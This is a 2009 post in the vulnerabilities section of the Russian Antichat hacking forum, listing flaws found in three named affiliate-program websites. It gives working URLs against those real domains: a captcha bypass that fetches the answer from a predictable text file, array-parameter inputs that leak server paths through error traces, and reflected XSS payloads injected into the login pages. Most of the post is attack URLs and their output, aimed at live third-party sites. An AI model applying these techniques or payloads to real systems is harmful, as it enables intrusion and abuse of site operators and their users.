ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Мелкие баги партнерок.
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Мелкие баги партнерок.
  #1  
Старый 26.10.2009, 11:53
Аватар для slesh
slesh
Reservists Of Antichat - Level 6
Регистрация: 05.03.2007
Сообщений: 1,985
Провел на форуме:
3288241

Репутация: 3349


Отправить сообщение для slesh с помощью ICQ
По умолчанию Мелкие баги партнерок.
Мельком пробежался по разделу партнерок. Сразу были обнаружены мелкие уязвимости. судя по виду 3 партнерки на одном двиге сидят.

1) Сорви БОЛЬШОЙ КУШ! Мега-конверт ру-траффа!
https://forum.antichat.ru/thread148939.html

Капча вида:
http://ru-adult.biz/captcha/captcha_img.php?1256541971_41&params=100,40,0,20
Обход:
http://ru-adult.biz/captcha/data/1256541971_41.txt
Найдено так:
http://ru-adult.biz/captcha/captcha_img.php?125654197'1_41&params=100,40,0,20

плохая фильтрация данных:
http://ru-adult.biz/login.php?username[]=12

Цитата:
#0 sqlPrep(Array ([0] => 12)) called at [/usr/local/www/gex/biz-adult.ru/Common/func.affiliates.php:398] #1 GetUserByUsernameAndPassword(Array ([0] => 12), ) called at [/usr/local/www/gex/biz-adult.ru/login.php:180]

Array encountered!
Array (
0 => 12
)
И следовательно XSS

http://ru-adult.biz/login.php?username[]=<script>alert()</script>

2) Партнерская программа "СмсКоровка"
https://forum.antichat.ru/thread150027.html

аналогичный баг
http://sekrety-vk.ru/enter.php?password[]=1212
Цитата:
#0 sqlPrep(Array ([0] => 1212)) called at [/usr/local/www/dateintim/sekrety-vk.ru/Includes/func.clients.php:225] #1 GetClientsListByField(Array ([0] => sms_need,[1] => sms_code), Array ([0] => 0,[1] => Array ([0] => 1212))) called at [/usr/local/www/dateintim/sekrety-vk.ru/enter.php:55]

Array encountered!
Array (
0 => 1212
)
И такаяже XSS

3) Для трафа ВКонтакте (1k-350$)
https://forum.antichat.ru/thread151110.html

тоже самое:

http://smskorovka.ru/login.php?username[]=12
Цитата:
#0 sqlPrep(Array ([0] => 12)) called at [/usr/local/www/dateintim/smskorovka.ru/Includes/func.affiliates.php:417] #1 GetUserByUsernameAndPassword(Array ([0] => 12), ) called at [/usr/local/www/dateintim/smskorovka.ru/login.php:20]

Array encountered!
Array (
0 => 12
)
и всё таже XSS

http://smskorovka.ru/login.php?username[]=%3Cscript%3Ealert()%3C/script%3E
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Баги игры Шустрый Фермер Godliker Социальные сети 40 08.09.2009 17:51
Баги приложения "Счастливый фермер" (Продолжение №2) regau Социальные сети 2290 04.09.2009 17:14
Баги приложения "Счастливый фермер" regau Социальные сети 3991 17.07.2009 13:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ